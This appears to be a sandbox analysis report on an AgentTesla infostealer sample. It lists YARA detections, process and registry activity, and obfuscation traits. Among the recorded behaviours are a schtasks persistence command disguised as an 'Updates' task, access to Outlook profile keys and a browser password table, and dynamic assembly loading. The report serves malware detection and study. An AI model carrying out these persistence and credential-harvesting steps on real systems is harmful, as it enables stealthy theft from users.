              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              .NET source code contains very large array initializations
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bB0063866u002d9900u002d46A9u002dBAF8u002dC30A0EC83145u007d/u00340AC4BAEu002d6FADu002d49F9u002dADA9u002d9C669FAB2230.csLarge array initialization: .cctor: array initializer size 10995
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.2cfbae8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 12.2.nrQtAokXKaSn.exe.2b4ba4c.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 0_2_029EC624
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 0_2_029EE918
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 0_2_029EE908
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_02C5FC18
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_02C56D40
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_0692F2E8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_06929100
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_0692AEE8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_0692E97C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_069225F8
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.345081208.00000000073D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.327264541.0000000003EB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000000.257511638.0000000000762000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000000.315508703.0000000000438000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.524125934.0000000000CF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeBinary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: nrQtAokXKaSn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeReversingLabs: Detection: 31%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeJump to behavior
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile created: C:\Users\user\AppData\Local\Temp\tmp152E.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/5@8/3
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538141931.0000000002F45000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.538732210.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_01
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeMutant created: \Sessions\1\BaseNamedObjects\OGrkiBVSf
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: vaoPXhU.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, nrQtAokXKaSn.exe.0.dr

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs.Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs.Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs.Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
              Source: initial sampleStatic PE information: section name: .text entropy: 7.457613017086461
              Source: initial sampleStatic PE information: section name: .text entropy: 7.457613017086461
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csHigh entropy of concatenated method names: '.cctor', 'ILvBvLsgDaWEH', 'gdMh44R7dy', 'mpWhJ0DwjU', 'I23hLHMKEG', 'nVyhZqdKfw', 'r9ThKqgi8D', 'x6BhnVXs0E', 'GXYhOjn8mG', 'Ba9hAJKArV'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/RF0rtnYZvHqeZZQmad.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'rbWCBAlkmD', 'BYrhkD7lnt', 'bOUhrVkeY6', 'rZth64JWqh', 'N1GhBhq1bd', 'mnhhuai7hm', 'gVbhX8SHDY', 'UWJhWdhBPe'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/xofaJsuXhoEZWIMVbx.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'w6KW6iuZ3C', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/XpgD7ix0Tc2tXfIVtE.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'A9mWBY6is4', 'K5fh3tNoBD', 'fvIhI4MtSm', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/M8y7RpwCvSV1iRZqGt.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'QckoesBIdE', 'BYrhkD7lnt', 'bOUhrVkeY6', 'XI8K8cJrgK', 'S0hKo16Hd2', 'C9aKGlyMn6', 'fcaKncAJlR', 'eT6KQo5CBm'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/cXSiYCEvRKO91GCE3S.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'dvGHDFjM1', 'rKJjTGMbWD', 'rtAjgVCNjh', 'QIojZhSlWt', 'I2FjEbEZoE', 'W1XjeaB1IA', 'uxEjRiIBJO', 'DfojfkBBD7'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/gCYF5Hms6cLTc6i3Fq.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'RbA1O63flB', 'K5fh3tNoBD', 'fvIhI4MtSm', 'yg4Kqobx5C', 'i4FKYmCy6E', 'KGE0bkLocg', 'YqN0dC3xxO', 'RmDK3s2RXH'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/V89IOPlyboSofKxcqg.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'lyv1I26HJ3', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'KrF0u61N2j', 'Ci10X3KiGR', 'tch00UKtac', 'd8J0NeP2MA', 'raI0hq4ftb'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.csHigh entropy of concatenated method names: '.ctor', 'bKRCCtDOmB', 'yYxCWkcsU3', 'h8PComFFyA', 'fLyC1NFYFr', 'g1YChkUc4o', 'PPdCsTsGs3', 'kPmCEjukFe', 'Dispose', 'lNECD1q2WL'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/VDWvhfkhVNLBgIpXl5.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'wYyoOGAXNE', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V', 't6shnEPT5Z', 'VT9h232c2x'
